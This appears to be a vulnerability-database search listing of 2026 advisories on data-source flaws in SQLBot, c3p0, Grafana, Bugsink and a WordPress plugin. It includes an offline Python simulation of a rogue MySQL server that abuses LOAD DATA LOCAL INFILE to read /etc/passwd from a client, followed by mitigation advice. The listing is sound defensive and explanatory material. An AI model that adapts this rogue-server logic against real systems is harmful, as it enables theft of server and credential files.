1032 matches found
CVE-2026-32949
SQLBot prior to version 1.7.0 is vulnerable to an SSRF that leads to arbitrary local-file reads. An attacker can abuse /api/v1/datasource/check by supplying a forged MySQL data source with extraJdbc="local_infile=1". During connectivity verification, a rogue MySQL server issues a malicious LOAD DATA...
PT-2026-26556
SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a Server-Side Request Forgery (SSRF) vulnerability that allows an attacker to retrieve arbitrary system and application files from the server. An attacker can exploit the...
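The mechanism behind the two SQLBot entries above, shown as an added illustration (this is not SQLBot's code and not an exploit for it): a rogue MySQL server needs neither valid credentials nor a real database. It accepts any login and, when the victim issues its connectivity-check query, answers not with a result set but with a LOAD DATA LOCAL INFILE request (a 0xFB packet naming a file on the client). Whether the victim hands the file over depends only on the CLIENT_LOCAL_FILES capability bit the client advertised in its handshake, which is what a `local_infile=1` connection option turns on. The Python below models both sides of that exchange offline; the packet layouts follow the MySQL client/server protocol, while the victim's filesystem is a constructed dict and the check query, version string and credentials are assumptions.

```python
import struct

# MySQL client capability flags (values from the MySQL client/server protocol)
CLIENT_LOCAL_FILES = 0x00000080   # client agrees to serve LOAD DATA LOCAL INFILE requests
CLIENT_PROTOCOL_41 = 0x00000200


def packet(seq, payload):
    """MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def split_packets(stream):
    """Split a raw byte stream back into (sequence id, payload) tuples."""
    out, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        out.append((stream[pos + 3], stream[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return out


def handshake_v10(conn_id=7):
    """Protocol::HandshakeV10 greeting from the rogue server (assumed version string;
    the auth plugin data is constant because the server never checks credentials)."""
    caps = CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES
    return (
        b"\x0a" + b"8.0.0-rogue\x00"
        + struct.pack("<I", conn_id)
        + b"A" * 8 + b"\x00"                      # auth-plugin-data-part-1, filler
        + struct.pack("<H", caps & 0xFFFF)        # capability flags, lower 16 bits
        + b"\x21"                                 # character set (utf8_general_ci)
        + struct.pack("<H", 0x0002)               # status flags: SERVER_STATUS_AUTOCOMMIT
        + struct.pack("<H", caps >> 16)           # capability flags, upper 16 bits
        + b"\x15" + b"\x00" * 10                  # auth-plugin-data length (21), reserved
        + b"B" * 12 + b"\x00"                     # auth-plugin-data-part-2
        + b"mysql_native_password\x00"
    )


def handshake_response_41(caps, user=b"root"):
    """Protocol::HandshakeResponse41 as a client sends it; only the leading flags matter here."""
    return (
        struct.pack("<I", caps)                   # client capability flags
        + struct.pack("<I", 1 << 24)              # max packet size
        + b"\x21" + b"\x00" * 23                  # charset, reserved
        + user + b"\x00"
        + b"\x00"                                 # empty auth response (length-encoded 0)
    )


def client_allows_local_infile(handshake_response):
    """The rogue server's only real question: did the client advertise CLIENT_LOCAL_FILES?"""
    caps = struct.unpack_from("<I", handshake_response, 0)[0]
    return bool(caps & CLIENT_LOCAL_FILES)


# OK packet: header 0x00, affected rows 0, last insert id 0, status AUTOCOMMIT, 0 warnings
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"


def local_infile_request(path):
    """Sent instead of a result set: 0xFB followed by the file the client must upload."""
    return b"\xfb" + path.encode()


def run_rogue_session(client_caps, target_path, client_fs):
    """Simulate the whole exchange. client_fs is a constructed dict standing in for the
    victim's filesystem. Returns (stolen bytes or None, list of (side, bytes) on the wire)."""
    wire = [("S", packet(0, handshake_v10()))]
    response = handshake_response_41(client_caps)
    wire.append(("C", packet(1, response)))
    wire.append(("S", packet(2, OK_PACKET)))                  # accept any credentials
    # The victim runs its connectivity-check query; the query text is an assumption.
    wire.append(("C", packet(0, b"\x03SELECT 1")))            # COM_QUERY
    wire.append(("S", packet(1, local_infile_request(target_path))))
    if not client_allows_local_infile(response):
        # A client that did not advertise CLIENT_LOCAL_FILES rejects the 0xFB packet
        # instead of reading the file, so the rogue server gets nothing.
        return None, wire
    # Client behaviour with the flag set: stream the file in packets, then an empty packet.
    data = client_fs.get(target_path, b"")
    seq, upload = 2, b""
    for off in range(0, len(data), 16):                       # small chunks show multi-packet uploads
        upload += packet(seq, data[off:off + 16])
        seq += 1
    upload += packet(seq, b"")
    wire.append(("C", upload))
    # The rogue server reassembles the upload (terminated by the empty packet) and sends OK,
    # so the victim's connectivity check reports success.
    stolen = b""
    for _, payload in split_packets(upload):
        if payload == b"":
            break
        stolen += payload
    wire.append(("S", packet(seq + 1, OK_PACKET)))
    return stolen, wire


if __name__ == "__main__":
    FAKE_FS = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}   # constructed sample
    for caps in (CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES, CLIENT_PROTOCOL_41):
        stolen, _ = run_rogue_session(caps, "/etc/passwd", FAKE_FS)
        print(hex(caps), "->", stolen)
```

The point for a data-source check endpoint is that the client decides. A server-controlled connection cannot be made safe by validating what the remote server sends, because the remote server is the attacker's; the check must run with a connector that never advertises CLIENT_LOCAL_FILES, and any user-supplied extra connection parameters (such as the `local_infile` option of the Python MySQL drivers or `allowLoadLocalInfile` on Connector/J) must be rejected or stripped before the connection is opened.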
Budibase code issue vulnerability
Budibase is an open-source platform developed by Budibase in the UK. It allows internal applications, workflows, and management panels to be built within minutes. Budibase versions 3.30.6 and earlier contain code issue vulnerabilities. These vulnerabilities stem from the fact that the REST data...
PT-2026-26260
A stored cross-site scripting (XSS) vulnerability affects HCL Unica Marketing Operations v12.1.8 and lower. Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP...
CVE-2026-28791
creationtimestamp | type | source
---|---|---
2026-03-12 05:09:56+00:00 | published-proof-of-concept | https://github.com/tinacms/tinacms/security/advisories/GHSA-5hxf-c7j4-279c
2026-03-12 19:40:05+00:00 | seen | https://gist.github.com/alon710/d73d499cf1d6e8d3c3762966f6b93ea2...
SUSE CVE-2026-27830
c3p0, a JDBC Connection pooling library, is vulnerable to attack via maliciously crafted Java-serialized objects and javax.naming.Reference instances. Several c3p0 ConnectionPoolDataSource implementations have a property called userOverridesAsString which conceptually represents a Map. Prior to...
CVE-2026-27830 c3p0 vulnerable to Remote Code Execution via unsafe deserialization of userOverridesAsString property
c3p0, a JDBC Connection pooling library, is vulnerable to attack via maliciously crafted Java-serialized objects and javax.naming.Reference instances. Several c3p0 ConnectionPoolDataSource implementations have a property called userOverridesAsString which conceptually represents a Map. Prior to...
CVE-2026-21725
A flaw was found in Grafana. This vulnerability, known as a time-of-create-to-time-of-use (TOCTOU) issue, allows an attacker to delete a data source without proper authorization. For this to occur, the attacker must have previously managed the data source, and it must be recreated with the same...
CVE-2026-21725
A time-of-create-to-time-of-use (TOCTOU) vulnerability lets recently deleted-then-recreated data sources be re-deleted without permission to do so. This requires several very stringent conditions to be met:
- The attacker must have admin access to the specific datasource prior to its first deletion...
CVE-2026-21725
CVE-2026-21725 describes a TOCTOU issue in Grafana data sources where a recently deleted-then-recreated datasource can be re-deleted by an attacker. Conditions include admin access before first deletion, a 30-second window on the same pod, the attacker deleting the datasource, a recreate by anoth...
CVE-2026-27614
Bugsink is a self-hosted error tracking tool. In versions prior to 2.0.13, an unauthenticated attacker who can submit events to a Bugsink project can store arbitrary JavaScript in an event. The payload executes only if a user explicitly views the affected Stacktrace in the web UI. When Pygments...
PT-2026-22063
Name of the Vulnerable Software and Affected Versions: c3p0 versions prior to 0.12.0
Description: c3p0, a JDBC Connection pooling library, is susceptible to attack through maliciously crafted Java-serialized objects and javax.naming.Reference instances. Specifically, the userOverridesAsString...
CVE-2025-70956
creationtimestamp | type | source
---|---|---
2026-02-13 12:38:14+00:00 | seen | https://gist.github.com/Lucian-code233/beab9d14683ed2bdf5543be430b91c70
2026-02-17 16:36:50+00:00 | seen | https://bsky.app/profile/thehackerwire.bsky.social/post/3mf2yqt4qlu2v
2026-02-17 16:36:51+00:00 | seen | ...
Grafana has a Cross-site Scripting issue
Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...
GHSA-CQP7-WF4C-3XGC Grafana has a Cross-site Scripting issue
Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...
UBUNTU-CVE-2025-41117
Stack traces in Grafana's Explore Traces view can be rendered as raw HTML, and thus inject malicious JavaScript in the browser. This would require malicious JavaScript to be entered into the stack trace field. Only datasources with the Jaeger HTTP API appear to be affected; Jaeger gRPC and Tempo ...
CVE-2026-0632
The Fluent Forms Pro Add On Pack plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.1.12 via the 'saveDataSource' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to...
WordPress Fluent Forms Pro Add On Pack plugin <= 6.1.12 - Authenticated (Subscriber+) Server-Side Request Forgery via 'saveDataSource' vulnerability
Authenticated (Subscriber+) Server-Side Request Forgery via 'saveDataSource' vulnerability discovered by Andrea Bocchetti in WordPress Plugin Fluent Forms Pro Add On Pack versions <= 6.1.12...
1inch-agent-kit (=1.0.53), @0xchain/auth (>=0.0.1 <=1.1.0-beta.18) +4367 more potentially affected by CVE-2026-25639 via axios (>=1.0.0 <=1.13.4)
axios NPM version =1.0.0, =0.0.1, =0.0.1, =0.0.1, =0.0.1, =8.0.5, =6.1.0, =0.0.1-alpha.3, =1.0.3-rc.0, =2.0.1 - @1tokenfe/hd-ble-sdk =1.1.15 - @1tokenfe/hd-common-connect-sdk =1.1.15 - @1tokenfe/hd-core =1.1.15 - @1tokenfe/hd-transport-electron =1.1.15 - @1tokenfe/hd-transport-emulator =1.1.15 -...
CVE-2026-0632
CVE-2026-0632 affects the Fluent Forms Pro Add On Pack for WordPress. All versions up to and including 6.1.12 are vulnerable to Server-Side Request Forgery via the saveDataSource function. Authenticated users with Subscriber-level access or higher can cause the web application to make requests to...